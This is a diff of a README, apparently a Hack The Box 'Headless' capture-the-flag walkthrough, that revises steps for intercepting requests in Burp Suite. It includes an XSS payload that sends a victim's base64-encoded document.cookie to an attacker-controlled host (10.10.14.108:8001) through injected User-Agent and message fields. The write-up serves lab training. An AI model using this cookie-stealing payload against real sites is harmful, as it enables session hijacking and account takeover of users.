3v401/HackTheBox/Headless/README.md

 ##### 2. Configure Burp-suite scanner

 Open Burp-suite scanner.
 Click on "Temporary project in memory", "Next", "Use Burp defaults", "Start Burp".
-Click on `Proxy` tab, then on ìntercept is off` to set it on.
+Click on `Proxy` tab, then on `ìntercept is off` to set it on.
 You will have an outcome as follows:

 (pic10)

 Click on "Open browser".
 A browser will appear on your left.
-This explorer is designed to interact with Burp-suite so we will use it for the XSS.
+This explorer is designed to interact with Burp-suite.
+We will use it for the XSS.

 (pic11)

 Type in the search bar `http://10.10.11.8:5000/support`.
 You will observe that the page is freezed.
-This is because Burp-suite is not allowing the packets to continue.
-To land in the URL click on "Forward" button.
+When Burp Suite's proxy is set to intercept HTTP requests, it captures each HTTP request sent by your browser before it reaches the target server.
+This allows you to review, modify, or drop the request before it is forwarded to the target server.
+Click on "Forward" button.

 (pic12)

 You will see that the URL is reached.
 Introduce some random data into the webpage.
 Submit.
 Check the outcome on the right-hand side.
-That's all the packet information.
-Right-click on the packet information and select "send to repeater" so we will be able to try multiple things without recatch the packets each time.
+Burp-suite's right window is where you can play with the request/response information.
+Right-click on the request information and select "send to repeater" so we will be able to try multiple things without recatching the request several times.
 Now time to inject the payload.

 ```
 <script>var i=new Image(); i.src="http://{IP}:{port}/?cookie="+btoa(document.cookie);</script>
 ```

 Observe the terms `{IP}:{port}`in the previous command line (CL).
 The CL is generic and won't work.
-You have to find your IP address and use the port of the server built in step 1.
+You have to find your IP address and use the port of the server built in step 1 (server1).
 To know your IP address type in a new terminal `ifconfig` and you must see your personal IP and the IP assigned to your HTB VPN.
 The IP from the VPN is the one you have to use.
 In my situation is `10.10.14.108` so my XSS injection is `<script>var i=new Image(); i.src="http://10.10.14.108:8001/?cookie="+btoa(document.cookie);</script>`.

 Introduce this CL into Burp-suite in `User-Agent` field and forward the communication.
 If no results appear add it too into the `message` field and click on forward.